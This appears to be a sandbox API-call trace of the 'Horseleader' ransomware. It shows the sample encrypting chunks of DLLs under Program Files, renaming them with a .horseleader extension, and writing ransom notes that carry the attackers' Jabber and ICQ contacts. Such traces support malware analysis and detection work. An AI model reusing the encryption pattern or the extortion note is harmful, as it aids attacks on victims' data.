CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.431] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL") returned 68 [0250.431] StrStrW (lpFirst="VBE7.DLL", lpSrch=".txt") returned 0x0 [0250.431] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=3675976) returned 1 [0250.432] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.432] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.434] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.434] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.435] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x1be3a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.435] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.440] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.440] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.440] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x37c748, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.440] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.444] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.444] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.444] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.444] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.444] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.445] CloseHandle (hObject=0x1a4) returned 1 [0250.445] GetProcessHeap () returned 0x780000 [0250.445] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.445] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL.horseleader") returned 80 [0250.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll.horseleader")) returned 1 [0250.446] GetProcessHeap () returned 0x780000 [0250.446] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.446] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56d3ae00, ftCreationTime.dwHighDateTime=0x1cbc41d, ftLastAccessTime.dwLowDateTime=0xe2340dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x56d3ae00, ftLastWriteTime.dwHighDateTime=0x1cbc41d, nFileSizeHigh=0x0, nFileSizeLow=0x381748, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName="VBE7.DLL", cAlternateFileName="")) returned 0 [0250.446] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0250.446] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\#Decrypt#.txt") returned 73 [0250.447] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.447] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.447] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0250.448] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.449] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0250.449] CloseHandle (hObject=0x158) returned 1 [0250.449] GetProcessHeap () returned 0x780000 [0250.449] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.449] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="VBA7", cAlternateFileName="")) returned 0 [0250.449] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.449] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\#Decrypt#.txt") returned 68 [0250.449] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.450] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.450] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.451] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.451] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.451] CloseHandle (hObject=0x21c) returned 1 [0250.451] GetProcessHeap () returned 0x780000 [0250.452] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.452] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VC", cAlternateFileName="")) returned 1 [0250.452] lstrcmpiW (lpString1="VC", lpString2="Windows") returned -1 [0250.452] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC") returned 53 [0250.452] lstrcmpW (lpString1="VC", lpString2=".") returned 1 [0250.452] lstrcmpW (lpString1="VC", lpString2="..") returned 1 [0250.452] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.452] GetProcessHeap () returned 0x780000 [0250.452] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0250.452] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*") returned 55 [0250.452] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.454] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.454] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\.") returned 55 [0250.454] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.454] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.454] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.454] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\..") returned 56 [0250.454] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.454] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.454] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9ef3e00, ftCreationTime.dwHighDateTime=0x1cbd033, ftLastAccessTime.dwLowDateTime=0xd2618ca0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xc9ef3e00, ftLastWriteTime.dwHighDateTime=0x1cbd033, nFileSizeHigh=0x0, nFileSizeLow=0xf1b50, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdia100.dll", cAlternateFileName="")) returned 1 [0250.454] lstrcmpiW (lpString1="msdia100.dll", lpString2="Windows") returned -1 [0250.454] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll") returned 66 [0250.454] StrStrIW (lpFirst="msdia100.dll", lpSrch=".horseleader") returned 0x0 [0250.454] lstrcmpW (lpString1="msdia100.dll", lpString2="#Decrypt#.txt") returned 1 [0250.454] lstrcmpW (lpString1="msdia100.dll", lpString2="_uninstalling_.png") returned 1 [0250.454] lstrlenW (lpString=".testttjffg") returned 11 [0250.454] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll", lpSrch=".testttjffg") returned 0x0 [0250.454] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.455] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.455] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.456] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll") returned 66 [0250.456] StrStrW (lpFirst="msdia100.dll", lpSrch=".txt") returned 0x0 [0250.456] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=990032) returned 1 [0250.456] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.456] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.459] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.459] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.460] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x765a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.460] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.462] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.462] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.462] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xecb50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.462] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.465] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.465] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.465] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.465] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0250.466] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0250.466] CloseHandle (hObject=0x158) returned 1 [0250.466] GetProcessHeap () returned 0x780000 [0250.466] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.466] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll.horseleader") returned 78 [0250.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll.horseleader")) returned 1 [0250.467] GetProcessHeap () returned 0x780000 [0250.468] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.468] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1c53c00, ftCreationTime.dwHighDateTime=0x1cbfdf3, ftLastAccessTime.dwLowDateTime=0xbd2c6940, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xc1c53c00, ftLastWriteTime.dwHighDateTime=0x1cbfdf3, nFileSizeHigh=0x0, nFileSizeLow=0xd0d50, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdia90.dll", cAlternateFileName="")) returned 1 [0250.468] lstrcmpiW (lpString1="msdia90.dll", lpString2="Windows") returned -1 [0250.468] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll") returned 65 [0250.468] 